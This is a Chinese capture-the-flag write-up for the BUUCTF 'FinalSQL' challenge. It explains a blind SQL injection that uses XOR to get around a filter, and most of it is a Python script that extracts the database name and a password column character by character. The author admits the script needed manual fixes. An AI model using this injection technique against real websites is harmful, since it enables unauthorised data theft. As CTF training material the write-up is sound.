12345都点过了 访问id=6 提示 Clever! But not this table.
这里猜测id这里存在SQL注入,而不是以前的登录框 初步判断了一下,是一个数字型注入 且过滤了一些字符 需要fuzz一下 空格被过滤掉了用() union注入这些也被过滤的差不都了 FinalSQL可以想想到应该是盲注类型的题目 嘿嘿嘿 ^没有被过滤 可以在这里去搞点事情做做 题目有提示是盲注 所以这种题目还是跑脚本
import requests
import sys
import time
def get_DBlen ( url) :
for i in range ( 1 , 10 ) :
db_url = url+ "1^1^(length(database())=%d)#" % i
r = requests. get( db_url)
if "Click" in r. text:
print ( "数据库名称的长度为:%d" % i)
return i
def get_DBname ( url, length) :
DBname = ""
length = length + 1
for i in range ( 1 , length) :
Max = 122
Min = 41
Mid = ( Max+ Min) // 2
while Min <= Max:
db_url = url+ "1^1^(ascii(substr(database(),%d,1))>=%d)#" % ( i, Mid)
r = requests. get( db_url)
if "Click" in r. text:
Min= Mid+ 1
Mid= ( Min+ Max) // 2
pass
else :
Max = Mid- 1
Mid = ( Min+ Max) // 2
pass
pass
DBname = DBname + chr ( Mid)
print ( DBname)
return DBname
def get_TBname ( url) :
name= ""
i = 0
while True :
i = i+ 1
Max = 128
Min = 32
Mid = ( Max+ Min) // 2
while Min <= Max:
db_url = url+ "1^1^(ascii(substr((select(group_concat(password))from(F1naI1y)),%d,1))>=%d)" % ( i, Mid)
r = requests. get( db_url)
if "Click" in r. text:
Min= Mid+ 1
Mid= ( Min+ Max) // 2
pass
else :
Max= Mid- 1
Mid= ( Min+ Max) // 2
pass
pass
name= name+ chr ( Mid)
print ( name)
if Mid == 31 :
break
time. sleep( 0.5 )
if __name__== "__main__" :
url = "http://ff1a7c21-003a-43f1-85ec-8bbd9c55b53a.node3.buuoj.cn/search.php?id="
db_Len = get_DBlen( url)
db_Name = get_DBname( url, db_Len)
tb_name = get_TBname( url)
我吐槽一下,这个脚本我跑flag的时候跑错了两三次 最后手改的… 改了脚本